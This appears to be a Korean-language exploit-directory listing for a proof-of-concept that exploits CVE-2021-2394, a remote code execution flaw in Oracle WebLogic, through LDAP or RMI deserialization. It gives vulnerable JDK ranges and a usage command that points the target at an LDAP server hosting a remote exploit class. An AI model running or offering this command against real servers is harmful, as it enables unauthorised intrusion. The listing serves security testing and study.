Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-2394 — CVE-2021-2394에 대한 개념 증명 익스플로잇으로, Oracle WebLogic Server의 원격 코드 실행 취약점입니다. LDAP 또는 RMI 역직렬화를 사용하여 페이로드를 전달합니다. | Kitploit
도구/GitHubGitHub/lz2y/cve-2021-2394
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHublz2y/cve-2021-2394

CVE-2021-2394

CVE-2021-2394에 대한 개념 증명 익스플로잇으로, Oracle WebLogic Server의 원격 코드 실행 취약점입니다. LDAP 또는 RMI 역직렬화를 사용하여 페이로드를 전달합니다.

저장소 보기
402014년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2021-2394

CVE-2021-2394의 POC

  • 면책 조항
    • 이 프로젝트는 학습 용도로만 사용되며, 승인되지 않은 감지로 인한 직접적 또는 간접적 결과 및 손실에 대한 책임은 전적으로 사용자 본인에게 있습니다.
  • 주의 사항

    • POC는 IIOP를 사용하여 패킷을 전송합니다. 관련 종속성을 추가하십시오 (12.2.1.3.0 버전의 종속성은 릴리스에 있습니다).
    • 낮은 버전의 JDK를 사용하여 Weblogic을 설치하고 테스트하십시오.

      RMI 기반 공격 방식은 JDK 버전이 6u132, 7u131, 8u121 이전으로 제한됩니다. 8u122 이상 버전에서는 역직렬화 화이트리스트 메커니즘이 추가되어 RMI 원격 코드 로딩이 차단되었습니다. LDAP 기반 공격 방식은 JDK 버전이 6u211, 7u201, 8u191, 11.0.1 이전으로 제한됩니다. 8u191 버전에서 Oracle은 LDAP 벡터에 제한을 설정하여 CVE-2018-3149를 발표하고 JNDI 원격 클래스 로딩을 차단했습니다. 출처: https://www.freebuf.com/vuls/279465.html

    • 가상 머신 환경에서 재현이 안 되는 경우 https://xz.aliyun.com/t/7498을 참조하세요.
  • 사용 방법:

    • LDAP 서비스를 시작하십시오.
    • java -jar CVE_2021_2394.jar rhost rport ldapurl
    • 예시:java -jar CVE_2021_2394.jar 192.168.137.1 7001 ldap://192.168.137.1:8087/Exploit
  • 참고 링크:

    • https://mp.weixin.qq.com/s/onoMpyenDkMmsoGEw8VO2A
    • https://github.com/Y4er/CVE-2020-14756
    • https://github.com/Y4er/CVE-2020-2551
  • 업데이트

    • 2021/8/15 불필요한 코드 일부 삭제
  • 분석 글

    • https://mp.weixin.qq.com/s/AxJJxbkclr4ijXX8lpNAfw
도구 다운로드